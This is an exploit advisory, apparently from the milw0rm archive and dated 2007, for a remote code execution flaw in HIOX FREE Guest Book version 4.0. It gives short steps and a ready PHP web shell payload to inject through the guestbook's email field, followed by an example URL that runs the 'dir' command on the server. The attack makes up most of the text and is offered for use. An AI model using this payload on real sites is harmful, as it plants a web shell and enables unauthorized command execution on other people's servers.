48 lines
No EOL
1.2 KiB
Text
48 lines
No EOL
1.2 KiB
Text
+========================I=R=A=N============================+
|
|
|
|
HGB Version 4.0
|
|
|
|
=========================I=R=A=N=============================
|
|
|
|
+========================I=R=A=N============================+
|
|
|
|
Author :
|
|
|
|
Dj7xpl / Dj7xpl[at]Yahoo[dot]com
|
|
|
|
=========================I=R=A=N=============================
|
|
|
|
+========================I=R=A=N============================+
|
|
|
|
Type :
|
|
|
|
Remote Code Execution Vulnerability
|
|
|
|
=========================I=R=A=N=============================
|
|
|
|
+========================I=R=A=N============================+
|
|
|
|
Product / Vendor :
|
|
|
|
HIOX FREE Guest Book
|
|
|
|
http://www.hscripts.com/scripts/php/guestbook.php
|
|
|
|
=========================I=R=A=N=============================
|
|
|
|
+========================I=R=A=N============================+
|
|
|
|
Bug :
|
|
|
|
[1] Open Target By Browser
|
|
|
|
[2] Insert Bad Code In Email E.g : <?php passthru($_GET[cmd]);?>@yahoo.com
|
|
|
|
[3] See Bad C0de : http://[Targe]/[Path]/gb.php E.g : http://dj7xpl.ir/hgb/gb.php?cmd=dir
|
|
|
|
=========================I=R=A=N=============================
|
|
|
|
#Iran_e Sarbolande Man Sarboland Mimanad
|
|
#Sp Tnx : str0ke
|
|
|
|
# milw0rm.com [2007-04-10] |